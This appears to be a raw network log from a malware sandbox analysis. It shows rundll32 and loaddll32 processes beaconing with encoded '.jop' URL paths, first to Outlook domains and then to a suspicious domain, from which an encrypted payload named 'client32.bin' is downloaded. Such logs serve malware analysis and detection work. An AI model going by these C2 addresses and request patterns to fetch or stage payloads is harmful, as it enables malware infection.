2021-10-08 04:45:32 UTC	4	OUT	GET /pojol/xkXyR8LKA/eI1evutWYClFQ4W7hwct/llxVsyUgZqM6TRxf7bd/2z3_2BxCgTSZ4eiQRk7_2B/xhR9ASIByVYd5/k9IZWWUd/sbd5P5Eg3X7dqsFpKCJyTDt/IAd_2BtulH/3wtBmsW6X6ginLnLB/VmVEduvxIp7D/zWV8_2BxG6O/L9p9ON1U8Ev0PL/rZEhbsLNtjIw0seImBfEo/iFBYVWe9s_2F7XNI/16GpD45T/z.jop HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: outlook.com
2021-10-08 04:45:32 UTC	4	IN	HTTP/1.1 301 Moved Permanently Cache-Control: no-cache Pragma: no-cache Location: https://www.outlook.com/pojol/xkXyR8LKA/eI1evutWYClFQ4W7hwct/llxVsyUgZqM6TRxf7bd/2z3_2BxCgTSZ4eiQRk7_2B/xhR9ASIByVYd5/k9IZWWUd/sbd5P5Eg3X7dqsFpKCJyTDt/IAd_2BtulH/3wtBmsW6X6ginLnLB/VmVEduvxIp7D/zWV8_2BxG6O/L9p9ON1U8Ev0PL/rZEhbsLNtjIw0seImBfEo/iFBYVWe9s_2F7XNI/16GpD45T/z.jop Server: Microsoft-IIS/10.0 request-id: 87d2e33b-95da-d4c9-c25c-4e09678ebca6 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-FEServer: MWHPR04CA0035 X-RequestId: 12aff652-ce80-4832-b5a7-42d0ddef4cb5 MS-CV: O+PSh9qVydTCXE4JZ468pg.0 X-Powered-By: ASP.NET X-FEServer: MWHPR04CA0035 Date: Fri, 08 Oct 2021 04:45:31 GMT Connection: close Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49765	40.101.9.178	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-08 04:45:32 UTC	5	OUT	GET /pojol/xkXyR8LKA/eI1evutWYClFQ4W7hwct/llxVsyUgZqM6TRxf7bd/2z3_2BxCgTSZ4eiQRk7_2B/xhR9ASIByVYd5/k9IZWWUd/sbd5P5Eg3X7dqsFpKCJyTDt/IAd_2BtulH/3wtBmsW6X6ginLnLB/VmVEduvxIp7D/zWV8_2BxG6O/L9p9ON1U8Ev0PL/rZEhbsLNtjIw0seImBfEo/iFBYVWe9s_2F7XNI/16GpD45T/z.jop HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: www.outlook.com
2021-10-08 04:45:32 UTC	6	IN	HTTP/1.1 301 Moved Permanently Cache-Control: no-cache Pragma: no-cache Location: https://outlook.office365.com/pojol/xkXyR8LKA/eI1evutWYClFQ4W7hwct/llxVsyUgZqM6TRxf7bd/2z3_2BxCgTSZ4eiQRk7_2B/xhR9ASIByVYd5/k9IZWWUd/sbd5P5Eg3X7dqsFpKCJyTDt/IAd_2BtulH/3wtBmsW6X6ginLnLB/VmVEduvxIp7D/zWV8_2BxG6O/L9p9ON1U8Ev0PL/rZEhbsLNtjIw0seImBfEo/iFBYVWe9s_2F7XNI/16GpD45T/z.jop Server: Microsoft-IIS/10.0 request-id: 477b65d1-2bee-3801-5482-8b8691decbee Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-FEServer: AM5PR0201CA0006 X-RequestId: 160cd1b3-5269-4836-b790-c0d1d9f38ad8 MS-CV: 0WV7R+4rAThUgouGkd7L7g.0 X-Powered-By: ASP.NET X-FEServer: AM5PR0201CA0006 Date: Fri, 08 Oct 2021 04:45:32 GMT Connection: close Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.3	49766	52.97.178.98	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-08 04:45:33 UTC	6	OUT	GET /pojol/xkXyR8LKA/eI1evutWYClFQ4W7hwct/llxVsyUgZqM6TRxf7bd/2z3_2BxCgTSZ4eiQRk7_2B/xhR9ASIByVYd5/k9IZWWUd/sbd5P5Eg3X7dqsFpKCJyTDt/IAd_2BtulH/3wtBmsW6X6ginLnLB/VmVEduvxIp7D/zWV8_2BxG6O/L9p9ON1U8Ev0PL/rZEhbsLNtjIw0seImBfEo/iFBYVWe9s_2F7XNI/16GpD45T/z.jop HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: outlook.office365.com
2021-10-08 04:45:33 UTC	7	IN	HTTP/1.1 404 Not Found Content-Length: 1245 Content-Type: text/html Server: Microsoft-IIS/10.0 request-id: 407db856-2e34-d9a0-a01d-7a34e5abaa03 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-CalculatedFETarget: DB6P195CU001.internal.outlook.com X-BackEndHttpStatus: 404 X-FEProxyInfo: DB6P195CA0005.EURP195.PROD.OUTLOOK.COM X-CalculatedBETarget: DBBPR04MB6234.EURPRD04.PROD.OUTLOOK.COM X-BackEndHttpStatus: 404 X-RUM-Validated: 1 X-Proxy-RoutingCorrectness: 1 X-Proxy-BackendServerStatus: 404 MS-CV: Vrh9QDQuoNmgHXo05auqAw.1.1 X-FEServer: DB6P195CA0005 X-Powered-By: ASP.NET X-FEServer: AM7PR04CA0006 Date: Fri, 08 Oct 2021 04:45:32 GMT Connection: close
2021-10-08 04:45:33 UTC	7	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - Fil

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.3	49828	193.29.104.83	443	C:\Windows\System32\loaddll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-08 04:46:08 UTC	9	OUT	GET /pojol/JmNBTBOVOmz/MCpw56fik9t8Vy/ZlQ_2Fs0E_2BRi348G3ku/O4RYCcTkUHQqAEFn/ZLb4Oh70tUCJDi9/F36D_2BugWGC8OKj9V/fwXX1v0UR/M9E1r1EzxpRDCLMCcbeY/A_2B3uz4RwPntF_2BuP/Ki1_2FmNFhEPNS0hSUpVht/r0S2LnMb23MIW/ncpGMbXY/o8_2B1xBC/F_2Bxvm0VV/ikN.jop HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: xereunrtol.website
2021-10-08 04:46:08 UTC	9	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 08 Oct 2021 04:46:08 GMT Content-Type: application/zip Content-Length: 218248 Connection: close X-Powered-By: PHP/5.4.16 Set-Cookie: PHPSESSID=rg37m2v4eae0s9i2qusopebch4; path=/; domain=.xereunrtol.website Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: public Pragma: no-cache Set-Cookie: lang=en; expires=Sun, 07-Nov-2021 04:46:08 GMT; path=/ Content-Transfer-Encoding: Binary Content-Disposition: attachment; filename=client32.bin
2021-10-08 04:46:08 UTC	10	IN	Data Raw: 6c bd b1 55 78 3c 2f 83 96 64 28 5e 83 05 8a 9a 59 e6 8f 32 73 cc 25 de a8 df 45 46 5c 2d 0d b3 28 f4 8d 45 6b 12 58 97 d6 53 d0 b5 93 3f 2a 25 51 dc 23 ad 8b 05 f8 ab 94 02 fa c9 22 c7 8b 6e 75 10 d0 56 0b 1c b5 f9 0b a6 ec 6b c5 b4 0f 8c 2d 83 76 7b aa 47 60 e4 db 6d 87 2e 5f 50 3b e9 f5 82 a0 64 79 2f 8c c6 06 e8 e3 05 8f 00 27 8d f9 e7 63 00 f9 00 cd d7 22 84 c8 9e 1e 70 22 68 90 cd f2 a8 2a c3 66 b0 42 d8 df 29 ad cc 8b 27 d7 d2 75 b1 a2 d4 b6 de c2 f5 34 34 0e 8f e7 70 fb 01 16 88 11 90 33 ba 4b b0 87 5b ef 8e ce 71 3b fd 3e b4 43 79 ca 65 0f a6 03 cc 96 72 a8 96 ad ea 48 bc f5 23 36 9b d2 29 17 53 15 a2 b3 86 9f 7a 2b c0 b0 17 7b 86 5f 95 f6 d5 68 af de b9 ca df 3d 44 80 fc 23 4d c2 0a df 43 93 eb 3c 74 46 5a 69 3f 1a ff 44 2b fc f1 44 b6 c5 74 04 Data Ascii: lUx</d(^Y2s%EF\-(EkXS?%Q#"nuVk-v{G`m._P;dy/'c"p"hfB)'u44p3K[q;>CyerH#6)Sz+{_h=D#MC<tFZi?D+Dt
2021-10-08 04:46:08 UTC	25	IN	Data Raw: f1 d4 9c 97 55 af 90 29 bf 8c e4 69 c1 ab fa cb 06 10 d5 ec 65 1a a7 0c 19 b7 40 1d d1 bc 6f b0 66 ff 30 1f 25 92 a6 64 35 98 a1 26 af fc 75 67 99 70 a1 60 51 cd 1b 54 2b 6d 6a c8 83 2d 89 d5 53 98 20 7a 25 e6 83 9c 2a 3c 7d 8a 64 89 1b 65 da 37 58 4c dd 44 6a e3 16 a4 cc 55 64 8e 44 aa 77 c2 83 20 40 2c ab e7 0e c8 98 ba 9d 6b db 1e c9 01 8b 7b d0 52 ca a2 1a 0d 17 12 34 6f 17 a8 eb ed 86 5a d2 08 a1 19 29 03 07 41 8b c7 0f dd bd 27 58 47 83 22 37 36 2b 76 53 2f 99 6a ff 4d e8 31 0d 63 af 07 2b ed 46 cf 2c db 31 6a 93 01 aa 4b 64 5d 55 86 5f 6f fb b3 32 9a 04 02 e7 86 5e 77 2d 07 4d fc e3 e5 7e da 69 f8 b1 32 54 53 a3 18 7a 48 69 ed 81 33 a8 79 12 7a 09 12 78 e5 76 10 cc 53 e4 a9 c3 24 7f a6 96 81 b9 79 35 41 38 37 2f f0 e0 b8 bf a5 2d 57 da 67 5c 0b 0a Data Ascii: U)ie@of0%d5&ugp`QT+mj-S z%*<}de7XLDjUdDw @,k{R4oZ)A'XG"76+vS/jM1c+F,1jKd]U_o2^w-M~i2TSzHi3yzxvS$y5A87/-Wg\
2021-10-08 04:46:08 UTC	41	IN	Data Raw: 14 3a 58 80 b0 f3 f1 85 ac fc 89 28 3c a1 12 4c da 29 0c fa 3e 6d ca 3a 56 69 fd 46 23 f8 5a c7 3a 95 c4 1b 98 74 1a 52 64 e2 3a af 22 f4 54 11 2f 8a 95 98 62 19 52 8b bc bc 2f 9e 6c d8 73 6e 0b 59 17 b5 52 25 14 bb cb ca 95 71 9b 03 e9 df f6 f4 6a 58 57 8f f9 67 89 73 8e 61 c5 2b 7f ab ad c1 6e 29 d7 cd 6a 97 7e 99 f5 2b 5e 78 76 be 07 23 ad 56 41 88 6e 78 cb 39 f6 f1 67 1c c8 c4 1d ed d8 3e 90 89 d6 b5 32 ac d6 c1 9e fc 9b 24 67 12 e4 52 58 fe 61 1a e6 97 da 2e 97 19 31 e7 77 3e e2 e4 84 b3 74 0f d8 da 13 8d 58 a1 7b ad d4 d0 f7 cb d5 b5 66 df 61 c5 73 b3 f8 6b 52 de f9 29 43 cc e9 a3 fe e5 d0 b4 1b 59 b8 f9 ff 64 72 ea 30 b6 54 34 fd b7 3b 41 ea 93 0a 6c 20 5d fc a3 a4 8e 7a ed 49 9f 35 53 6c 32 78 60 d3 eb 51 c9 e3 24 b1 d9 84 72 75 53 49 1f f6 a5 df Data Ascii: :X(<L)>m:ViF#Z:tRd:"T/bR/lsnYR%qjXWgsa+n)j~+^xv#VAnx9g>2$gRXa.1w>tX{faskR)CYdr0T4;Al ]zI5Sl2x`Q$ruSI
2021-10-08 04:46:08 UTC	57	IN	Data Raw: c5 4d 3e e5 79 2a 49 f1 21 29 bc f5 ca 6c 1b 6e 17 d0 15 87 41 f6 e3 b2 3a c7 3a 77 9e 19 d7 2b 4b 4e dd bd 50 19 44 f3 b6 27 44 02 38 61 ca 43 9c ad ef 98 47 21 d0 af a5 4a 43 20 ef fe 99 4e 92 32 d4 df 07 cc 27 84 ec 71 fd 0f 80 e1 6a 65 0f 7a cd aa c7 12 57 71 f3 45 7f a1 47 5a fc 04 aa 9f 99 77 ec 2b 1a c7 d3 89 fc 63 11 07 e2 04 0f 4d fb f1 7e 9e 64 fa 3c fd d8 1c 4e d3 e4 ad f8 a8 4e 4c 19 a9 5e 8b ae f8 76 ff 0c 0e ec dc c5 14 23 6b f9 c1 26 14 3a 36 f5 c2 9e 2d aa e9 9c 35 29 f0 04 cc e4 a4 86 4c 80 89 47 88 b0 77 62 9d 98 9a b9 ee b0 2f 22 f1 23 9e e2 fe 27 e1 f1 24 2c 87 76 9b 8a 93 70 cc 1f 2d a6 4e 79 fa 03 cc f2 b3 fa 2e 6a 27 c5 44 15 0d 39 63 40 a4 9e b5 65 37 b4 54 c8 a0 64 93 82 db 91 5f 6c e5 ce 0a b5 06 3f 12 64 c6 f4 78 ef 87 7d 6f d1 Data Ascii: M>y*I!)lnA::w+KNPD'D8aCG!JC N2'qjezWqEGZw+cM~d<NNL^v#k&:6-5)LGwb/"#'$,vp-Ny.j'D9c@e7Td_l?dx}o
2021-10-08 04:46:08 UTC	73	IN	Data Raw: fc 13 c6 c7 bb 87 62 3d 39 6a 86 ad a2 35 99 35 9a bf 78 f4 aa 74 d6 a9 52 0e b5 c2 e7 c6 22 99 23 c1 e6 fb b7 38 55 6c da 7c a3 27 14 75 63 00 9d e2 ec 4b ab cd 20 53 07 ee 46 1b 6a 0f b7 20 46 d2 ec 56 db 3c 50 5e 6e 05 e7 19 f7 1b 09 c4 fa 9e 2d 53 9e 55 b8 73 12 85 33 37 e1 9a d5 63 da 31 65 7f d7 21 38 cc 3a 1e a7 88 41 03 89 3a 7d b0 4b aa 65 23 42 67 fc 0e d3 57 4d e7 b0 1f 07 19 8e 93 c2 d9 48 3d 71 fd 42 ad 71 be f7 2d b0 83 23 83 be 0c 8d a2 c1 c0 8d 19 15 1e 87 41 bc 89 eb 47 61 34 98 58 61 00 af 5a 43 95 8a 4f 3e 27 f8 ee 12 2e 60 93 d2 d4 25 4a c6 cd b6 2c d1 b4 fd 13 89 da e1 16 d9 23 b1 2e dc 25 26 97 99 ce b7 99 ca dc 11 ec ac 46 6e 30 46 b9 d9 65 85 07 79 c2 b3 53 68 8d 6d 50 c9 98 b5 65 d4 29 bb b1 e7 96 e5 bb 7e d3 e4 87 2c 1a ff c7 d9 Data Ascii: b=9j55xtR"#8Ul\|'ucK SFj FV<P^n-SUs37c1e!8:A:}Ke#BgWMH=qBq-#AGa4XaZCO>'.`%J,#.%&Fn0FeyShmPe)~,
2021-10-08 04:46:08 UTC	89	IN	Data Raw: d5 99 ba 9a e1 5a 81 5a 6e 5d 3c 24 b2 ca c7 57 6d 0c c5 b2 07 3d 9c a9 6f fc 32 27 c5 33 b4 88 06 4f 2e 37 4d e9 d4 a0 95 b8 df dc 9a c0 75 a1 0a b5 ac d6 4b 05 94 8e 54 b2 82 7d 5a 49 4e 1b 2e 6c 31 7f 43 72 d2 e4 2d 66 be a2 dc ac 23 94 3b 7f 0b c0 7f 90 da 3b 1b fc 5d 71 a1 b8 44 82 4b c3 ff 74 fa 84 29 57 1f df 5f 56 65 cd 8f f4 3d 8d b3 fa 62 e9 2d f2 dc 10 e7 47 54 30 3d 18 75 e2 25 94 a0 af 41 a4 d2 12 ea 6c f3 12 33 12 9e 62 58 39 19 0a 45 0d 6f 7f 5e 58 38 7d 93 bd 5f 1a d2 33 58 b2 1d 55 d1 d7 55 13 14 89 ff 7e d7 c0 a7 b4 69 bf 50 0b d6 7d ad 21 97 ff 36 25 8f f2 bd 0c a3 3f 7f 12 65 3d 0d 46 ae 1a fd ff 89 ed 06 be a8 45 c9 16 51 4f 7e 3b 08 5f 8b 65 03 34 90 5b 91 ac 97 a4 7b 87 87 7c af 85 c5 65 5f cb 49 9b 86 cc 18 33 a6 3d 59 23 ac 30 68 Data Ascii: ZZn]<$Wm=o2'3O.7MuKT}ZIN.l1Cr-f#;;]qDKt)W_Ve=b-GT0=u%Al3bX9Eo^X8}_3XUU~iP}!6%?e=FEQO~;_e4[{\|e_I3=Y#0h
2021-10-08 04:46:08 UTC	105	IN	Data Raw: 17 22 e8 fd bf 96 c2 79 44 f9 1f 50 23 f8 33 be 7f 7b df 10 9b 5e 9a 76 c7 0a 4c 83 be ec 3c ed 9e eb e0 58 b1 7a 5e 32 12 a4 e2 ad 7e 98 8d f3 70 62 e9 6d b5 20 ce a6 d2 d1 52 c7 e2 95 0a 97 02 50 5b 3e c5 62 84 05 a8 3f 20 ff b5 f3 ef 24 40 0c 6d 9e 44 af 31 97 8b b2 e5 37 c3 51 65 ee 8b 3c 98 3e b0 25 79 26 6c 21 19 b9 1c 95 65 33 17 58 b2 f0 57 50 2d aa 92 16 5d 35 30 43 ac 04 1a a2 e8 9b 3e 08 df 29 f1 75 f9 96 f0 17 3b 4b 88 0f 33 87 f0 71 4e b1 d4 43 58 cf 25 5e d1 7b 81 64 0b 08 df 3a 91 16 da ba 35 ed 45 f9 8e 09 63 eb b1 08 9e 62 20 33 97 d3 cc fb 58 a6 58 c5 52 68 c5 c7 c7 1a bc 77 db 0b 7f 25 26 92 5e 0a fb 02 94 b1 e3 bd 03 85 d9 df 07 32 29 a3 da 9c 12 1e 10 0b c1 65 c4 25 24 86 ff 8b 7b 0c c9 48 f8 c2 e0 b3 63 72 ea 47 7b 88 59 68 10 ff a4 Data Ascii: "yDP#3{^vL<Xz^2~pbm RP[>b? $@mD17Qe<>%y&l!e3XWP-]50C>)u;K3qNCX%^{d:5Ecb 3XXRhw%&^2)e%${HcrG{Yh
2021-10-08 04:46:08 UTC	121	IN	Data Raw: 36 1e 66 36 e9 ab 62 53 c6 24 e8 cf 14 7d de 3a fc 16 27 d6 4e 15 b5 49 b6 8e f8 ac 23 51 1e 9f f4 38 0b 0a 9d 4d 0a 49 d7 25 29 2b 6f 52 97 ff 99 ac 29 76 72 d5 00 86 62 3f fc 0f 1d 9d 8b 1e 11 67 0d 8e 2f 13 a5 06 c9 6f 51 4b ca ab 20 46 48 e8 69 68 59 1d 34 f2 2e 4e 19 af de c1 8c 99 4a 58 6e bc 27 86 08 5c 26 a9 c5 16 59 ab dc 1e 01 ea f1 cf b8 46 a6 4b a6 70 fb c5 f3 03 0c 88 cb 75 fc ed 70 4e 7a de d8 79 44 c2 1f 42 35 53 ae 6a cd 98 74 82 a0 9b e9 d1 94 ec 28 5e cd 81 ac 3d a6 f9 72 0b 3c 9d 14 c3 93 8f 73 fd b1 35 34 65 9e 7f e1 4c dd 03 71 67 1e 40 9a ae 47 fa 54 c3 45 56 4a 64 c9 a4 34 4c 53 e4 c3 35 ae 23 e4 4c 98 58 09 c6 71 a7 22 8d 55 15 e4 88 ab f3 7f 9e b2 12 e3 b9 3c 04 6a 8c ad 89 4d 87 d0 a6 2f 1e c9 db be c2 d6 3d 76 43 6c 53 34 2a 5b Data Ascii: 6f6bS$}:'NI#Q8MI%)+oR)vrb?g/oQK FHihY4.NJXn'\&YFKpupNzyDB5Sjt(^=r<s54eLqg@GTEVJd4LS5#LXq"U<jM/=vClS4*[
2021-10-08 04:46:08 UTC	137	IN	Data Raw: a9 12 1c d4 6d b4 8a cd a0 43 40 81 23 c3 00 96 7f 96 0b ca b5 d0 90 0b 95 0f 87 a6 01 6d 95 aa 34 88 ee 7a e3 5f 9f 2a 3a e3 97 c9 1f da 68 ab ea 30 70 d8 c2 8c 3e df 77 9d 5a b9 89 e8 75 21 26 a8 58 98 b2 cb 60 0c 02 dc 8f 06 a6 6d cb 5b 2c df de d4 7c 99 16 e4 a8 b3 3d 4b 6b 85 a1 79 c7 e0 53 2e 2d 36 b2 7f 56 1b 33 85 5a e3 c4 08 c7 2f fd 21 58 dc 54 00 e6 db c2 17 be 88 c1 1a db da 96 49 1d 23 e3 20 94 8b 0a 77 a9 8c aa bf 61 f0 67 56 bf 1b 5c 31 25 72 8f c2 1d 59 e5 48 30 a1 8e b8 d4 73 67 65 33 f2 a5 b6 15 7a 47 ed 5d f2 78 26 07 9c d1 8a f4 fb e2 6b f1 a9 1a 21 3d 23 d7 02 20 dd c0 fb 41 14 aa 66 b1 d5 b0 45 c1 3c 5c 17 35 63 60 dc c1 dc 25 b8 b5 8a fb 05 27 52 f9 ec 1e 22 7b e6 ec 32 de e7 58 d2 31 c5 13 61 5a c3 ea ee af 7e 00 fd 67 34 03 22 68 Data Ascii: mC@#m4z_*:h0p>wZu!&X`m[,\|=KkyS.-6V3Z/!XTI# wagV\1%rYH0sge3zG]x&k!=# AfE<\5c`%'R"{2X1aZ~g4"h
2021-10-08 04:46:08 UTC	153	IN	Data Raw: 02 5f 02 fe 23 fd 84 cf 58 65 bf 0f 62 e6 87 5c 2d cd e0 bc 62 71 af 8e 50 c9 f9 27 ee 56 ac 5e d9 ef 29 65 92 52 50 54 ae 31 0c b3 87 2d 56 ad a4 ba 2b fd 8c e1 ec 2c 71 e7 93 44 bc 7f 37 19 79 1b aa 3a 39 ae ba 2d ce a1 b7 d7 40 e1 64 e8 99 76 54 ea 94 50 a9 05 76 e0 db 0f 6d ac 49 8c e3 b0 75 7a 4e 2f eb 95 be e7 07 aa ab 31 7b e0 d8 e3 3c df 38 81 94 11 eb cc 79 9a 43 f2 3e 2c 0c 5b 14 e5 f1 75 d3 05 de 4e a6 a0 54 6b 99 00 22 2b 9b 55 7b 75 c0 7a c6 45 9b 15 33 41 e0 16 b6 cc fc 71 75 07 67 6c 20 ca b2 61 28 7d 58 cc 58 10 0c 50 c3 b5 17 aa d7 40 ec 21 fe 0b 5c 52 de b9 73 c0 1c 4f 2b 99 f1 d6 22 2e 5a 29 e0 08 b4 bb 7d 27 3b 97 ee 15 51 92 34 2e 7c 61 62 75 b9 a2 d4 d8 f1 96 6d 8a c9 8d 22 2e c9 2f 8d 8e fa b7 04 8f 81 f6 42 45 ce 9f 06 1e a2 c4 ca Data Ascii: _#Xeb\-bqP'V^)eRPT1-V+,qD7y:9-@dvTPvmIuzN/1{<8yC>,[uNTk"+U{uzE3Aqugl a(}XXP@!\RsO+".Z)}';Q4.\|abum"./BE
2021-10-08 04:46:08 UTC	169	IN	Data Raw: 17 76 76 00 8e 69 e7 50 e7 2a aa 8b 13 8d 95 a3 bc 99 e7 2e bb 2d 9d d5 59 97 81 31 a3 ab 1b a8 b4 04 f4 9a d7 df 21 73 99 c5 a1 89 df 8f 0b 47 67 31 06 f5 b9 c4 18 57 5e 75 07 ab bb da 95 73 92 99 f6 f0 2f bd 9f c9 58 76 f4 1f d7 af c6 c6 e2 a4 7e e6 bf 32 96 a7 19 7f 94 76 3b ef 5d 01 59 c6 a4 6a ce d6 87 dc a8 65 19 ae 7c a1 34 bf ab 60 e3 dc 57 bd 34 21 d5 ed 6e 39 19 9d 0c e7 0f b1 5d 32 61 2b 3d 54 04 a8 d0 33 68 eb 34 4e 8a 91 22 f5 ce 28 4c be fc 1d a3 7e 54 cd 94 7d fe 9c 61 36 f6 59 8b d8 1f ef 19 a5 27 72 1f 65 89 a5 58 7e 10 47 2d 2b 82 4b 0f ff b0 1c 7e 28 b6 2d de 32 08 f9 39 c7 5d 3b f0 18 a8 ca d4 ef aa f9 6d cb e8 9b 94 d9 9f a2 5a f1 fd 8c ed 3b 72 01 33 3f b1 d9 90 be 32 0e 9b 0b 12 55 46 e4 d3 b6 d6 5f 0d 24 88 8c 14 3b 02 fe 44 e9 b8 Data Ascii: vviP*.-Y1!sGg1W^us/Xv~2v;]Yje\|4`W4!n9]2a+=T3h4N"(L~T}a6Y'reX~G-+K~(-29];mZ;r3?2UF_$;D
2021-10-08 04:46:08 UTC	185	IN	Data Raw: b2 75 c2 d9 30 e3 9c a9 d2 44 ce a8 c3 51 b7 4f 11 e2 fe d9 e3 85 36 ea d2 35 54 58 04 5b f2 87 6e 9b 60 78 c0 bd bd 43 75 d4 c0 9f 9e cc 1e e5 28 10 c3 a3 c7 74 20 28 47 3c 59 6d 62 e2 5a 9b c0 c9 88 ac 31 bb 82 01 23 d8 f5 8c c0 55 a2 cc 56 cc 2b 88 6d 1d a2 85 76 de 24 4b 06 c4 00 c5 f6 d2 f9 3c 03 8e 7a d7 fc c7 e1 82 0f b6 32 9a e1 08 02 8d 7c 0b 26 da 60 b9 b2 fc df db 60 a9 a5 ed 9c b7 16 cc 43 95 e7 60 59 53 21 09 0b 50 41 31 9e fa cf 17 ff 31 0c 55 30 e4 b1 ac a4 16 68 a1 17 da e3 65 54 89 ec 18 8f 34 21 84 01 bf f4 67 42 fc 3b 3b 91 22 de c3 c4 b3 87 48 be 4f 28 de 3a 9e f0 af bc dc 8d 71 7f bd 77 25 4e 7f b3 82 e0 70 4b d1 36 2f b0 d9 4a c1 60 38 f5 6d 25 a0 d6 94 aa e9 2b 7c d2 0f e1 16 d6 bd 3c 70 e2 18 b1 68 ac c4 49 68 c6 7e ba f8 df 6c 10 Data Ascii: u0DQO65TX[n`xCu(t (G<YmbZ1#UV+mv$K<z2\|&``C`YS!PA11U0heT4!gB;;"HO(:qw%NpK6/J`8m%+\|<phIh~l
2021-10-08 04:46:08 UTC	201	IN	Data Raw: 03 f1 9b 10 f9 29 8a 21 a9 a1 75 75 26 bc 31 a8 bb 40 7a 68 50 e3 3e 48 98 94 f7 3c 63 84 f4 57 ce 30 80 be d8 c0 66 7a 9f fb 05 9b 9c 39 58 15 95 67 db ba e8 30 57 5b ca 96 8a 57 66 8a ce 65 8a 92 98 86 f5 2f 4e ba 5f 83 72 1c c4 32 79 6d 36 fb 48 63 17 45 e5 93 42 d7 c5 1e c6 b1 5b 96 4c b5 71 59 2a ba 97 db 47 8b e3 4b b0 ac f9 fa 8b 2f d5 28 58 9d 68 fd 17 42 3b b2 31 ee eb 37 96 16 59 a7 ac 8e 85 28 3e 5c 7e 38 b3 8d 68 e2 39 48 ba b4 33 f1 57 28 81 14 9b 63 42 f2 5f 9c f5 0b 04 0e fe 35 92 9c df 8e be 6a f2 b8 31 6f a7 c9 3c 36 9b 78 c3 00 f9 b1 14 42 98 ac 43 6f 33 0a 49 4e be dc 14 c2 f2 90 c2 f6 2c bd df 3c 60 6d 83 f6 f4 48 b7 de 18 db 77 da 76 48 3c 8c 59 6e 09 56 ff a6 6d 8c 3e 10 71 40 33 2e af 21 e5 21 55 27 c1 c7 29 47 26 0f 56 bc 14 01 04 Data Ascii: )!uu&1@zhP>H<cW0fz9Xg0W[Wfe/N_r2ym6HcEB[LqY*GK/(XhB;17Y(>\~8h9H3W(cB_5j1o<6xBCo3IN,<`mHwvH<YnVm>q@3.!!U')G&V
2021-10-08 04:46:08 UTC	217	IN	Data Raw: 68 fc a2 2c 62 69 17 7e 64 30 53 66 82 12 65 25 31 80 13 2b 5e ed 93 06 79 a1 a8 4f c7 53 f6 97 fc 5f ed 47 e6 90 a0 1c b1 63 b0 2e e7 f3 dd 5b af 67 3b 85 db 3b d9 62 eb ad cb dc 8d 79 ab 80 67 75 0a d0 6d 60 db db ec 93 a1 0c 52 f3 95 1e 80 f1 06 9f 67 8f d0 16 41 52 3c bd 08 1c e5 fc 2f d4 d6 bd f1 70 18 8e 94 9b ac 2d 44 3f a9 e3 b6 8f c5 26 ad 49 d4 92 31 91 b8 f1 a4 31 10 e9 13 f5 b0 8d fc de e1 4d 57 0b 40 46 5a 23 00 ed 5d 80 54 3a 4b 4e c7 9c 21 c9 cc 4a 32 7d ad 60 76 16 0b 72 bc 62 27 e5 15 a4 fd 3e 58 57 11 0d fd 9f a7 fa a4 d6 de d6 f5 7b 21 54 df 08 ff b9 f5 9a 4e ec 3b 54 16 f0 7d 22 05 e0 b2 d1 a6 91 8d 59 4f 94 09 95 4e b5 02 91 e0 57 80 6c 74 8f 2a 5d 43 64 e6 44 d0 58 72 37 e6 54 f2 43 e9 5b 84 3b 01 16 df 5e f1 f0 b5 62 8d 94 7d 87 0b Data Ascii: h,bi~d0Sfe%1+^yOS_Gc.[g;;bygum`RgAR</p-D?&I11MW@FZ#]T:KN!J2}`vrb'>XW{!TN;T}"YONWlt*]CdDXr7TC[;^b}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.3	49829	193.29.104.83	443	C:\Windows\System32\loaddll32.exe

Timestamp	kBytes transferred	Direction	Data
